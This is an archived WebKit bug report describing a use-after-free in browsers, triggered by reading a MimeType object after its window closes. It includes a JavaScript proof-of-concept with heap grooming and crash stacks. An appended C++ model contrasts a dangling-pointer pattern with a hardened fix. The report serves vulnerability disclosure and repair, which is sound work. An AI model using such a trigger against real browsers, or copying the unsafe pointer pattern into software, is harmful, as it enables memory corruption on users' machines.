[Webkit-unassigned] [Bug 43297] New: cross_fuzz "plugins" window reload memory corruption
bugzilla-daemon at webkit.org
Sat Jul 31 04:13:26 PDT 2010
https://bugs.webkit.org/show_bug.cgi?id=43297
Summary: cross_fuzz "plugins" window reload memory corruption
Product: WebKit
Version: 528+ (Nightly build)
Platform: PC
OS/Version: Windows Vista
Status: NEW
Severity: Major
Priority: P1
Component: HTML DOM
AssignedTo: webkit-unassigned at lists.webkit.org
ReportedBy: skylined at chromium.org
CC: eric at webkit.org
Blocks: 42959
Created an attachment (id=63148)
--> (https://bugs.webkit.org/attachment.cgi?id=63148)
Repro
This bug is similar to bugs 43295 and 31886 in that it is also a use-after-free bug triggered by getting a certain property of a window object and reloading/closing the window before using the property.
<script>
    var target_window, mimeType;

    // Step 1: open a child window, grab a MimeType object that belongs to
    // that window, then close the window while still holding the object.
    function step1() {
        console.log('step1');
        target_window = window.open("");
        mimeType = target_window.clientInformation.mimeTypes[0];
        console.log('step2');
        target_window.close();
        setTimeout(step2, 100);
    }

    // Step 2: churn the heap, then touch the MimeType object after its
    // window is gone (postMessage serializes it, reading .enabledPlugin),
    // and reload so the cycle repeats.
    function step2() {
        heap_corrupt();
        try { target_window.postMessage(mimeType); } catch (e) {}
        console.log('reload');
        location.reload();
    }

    // Allocate many objects of varying sizes so freed memory is reused,
    // which makes the stale access more likely to fail visibly.
    function heap_corrupt() {
        console.log('heap corrupted');
        var a = [];
        for (var si = 0; si < 0x100; si++) {
            try { a.push(new WebGLByteArray(si)); } catch (e) {}
            a.push(new Array(si).join('A'));
        }
        for (var li = 0x200; li < 0x10000; li <<= 1) {
            try { a.push(new WebGLByteArray(li)); } catch (e) {}
            a.push(new Array(li).join('A'));
        }
        delete a; // drop the references so the collector can reclaim them
        gc();     // requires an engine build that exposes gc() to script
    }

    step1();
</script>
Stacks vary, as the use-after-free can lead to unpredictable behavior. A common stack in Chromium is:
stack: WebCore::SubframeLoader::allowPlugins
WebCore::DOMMimeType::enabledPlugin
WebCore::DOMMimeTypeInternal::enabledPluginAttrGetter
v8::internal::Object::GetPropertyWithCallback
v8::internal::Object::GetProperty
v8::internal::Object::GetPropertyWithReceiver
v8::internal::Runtime::GetObjectProperty
v8::internal::GetProperty
...
Safari gave me this:
stack: WebCore::MimeType::enabledPlugin
WebCore::jsMimeTypeEnabledPlugin
JSC::PropertySlot::getValue
WebCore::SerializingTreeWalker::getProperty
WebCore::walk<...>
WebCore::SerializedScriptValueData::serialize
WebCore::JSDOMWindow::postMessage
WebCore::jsDOMWindowPrototypeFunctionPostMessage
...
This affects Safari 5, WebKit Nightly, Chrome 5 and Chromium latest and probably everything using WebKit.
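As a defender-side illustration of the lifetime pattern behind this report, here is an added example (not WebKit code and not the reporter's repro): a constructed C++ model in which a MimeType-style object keeps a back-pointer to the frame that created it. The vulnerable shape keeps a raw pointer that is never cleared, so an accessor reached after the window is closed dereferences freed memory; the hardened shape registers with the frame, has the pointer cleared on frame teardown, and fails closed. The names Frame, FrameClient, UnsafeMimeType, SafeMimeType and pluginsAllowed are assumptions of this model, and the fix shape shown is a generic mitigation, not a description of the actual WebKit patch.

```cpp
// Constructed model of a frame-owned DOM object outliving its frame.
// Not WebKit code; type names are assumptions made for this illustration.
#include <algorithm>
#include <cassert>
#include <iostream>
#include <memory>
#include <vector>

// Interface a frame uses to tell dependants that it is going away.
struct FrameClient {
    virtual ~FrameClient() = default;
    virtual void frameDestroyed() = 0;
};

// Stands in for the browsing context created by window.open().
struct Frame {
    bool pluginsAllowed = true;           // what enabledPlugin() would consult
    std::vector<FrameClient*> clients;    // objects holding a back-pointer
    ~Frame() {
        // window.close(): every dependant loses its back-pointer first.
        for (FrameClient* c : clients)
            c->frameDestroyed();
    }
};

// Vulnerable shape: raw back-pointer that nobody clears. Once the Frame is
// destroyed, enabledPlugin() reads freed memory (undefined behaviour), which
// is the use-after-free the stacks above show. Shown for contrast only;
// never call it after the frame is gone.
struct UnsafeMimeType {
    Frame* frame;
    explicit UnsafeMimeType(Frame* f) : frame(f) {}
    bool enabledPlugin() const { return frame->pluginsAllowed; }
};

// Hardened shape: the object registers with its frame, the frame nulls the
// back-pointer during teardown, and the accessor fails closed.
struct SafeMimeType : FrameClient {
    Frame* frame;
    explicit SafeMimeType(Frame* f) : frame(f) { frame->clients.push_back(this); }
    ~SafeMimeType() override {
        if (frame)   // unregister only if the frame still exists
            frame->clients.erase(std::remove(frame->clients.begin(),
                                             frame->clients.end(), this),
                                 frame->clients.end());
    }
    void frameDestroyed() override { frame = nullptr; }
    bool isAttached() const { return frame != nullptr; }
    // Returns false rather than touching a dead frame.
    bool enabledPlugin() const { return frame && frame->pluginsAllowed; }
};

// Mirrors the repro's ordering: open window, take the MimeType object,
// close the window, then use the object.
bool accessAfterWindowClosed() {
    auto frame = std::make_unique<Frame>();
    SafeMimeType mimeType(frame.get());
    frame.reset();                    // window.close(): frame destroyed
    assert(!mimeType.isAttached());   // back-pointer was cleared, not dangling
    return mimeType.enabledPlugin();  // false, no freed-memory read
}

// Control case: the frame is still alive when the property is read.
bool accessWhileWindowOpen() {
    Frame frame;
    SafeMimeType mimeType(&frame);    // destroyed before frame, unregisters itself
    return mimeType.enabledPlugin();  // true
}

int main() {
    std::cout << "open:   " << accessWhileWindowOpen() << "\n";
    std::cout << "closed: " << accessAfterWindowClosed() << "\n";
    return 0;
}
```

The point of the model is the ownership contract, not the particular boolean: any object that a script can hold across a window's lifetime must either own what it points at or be told when that target dies, and its accessors must have a defined result once detached.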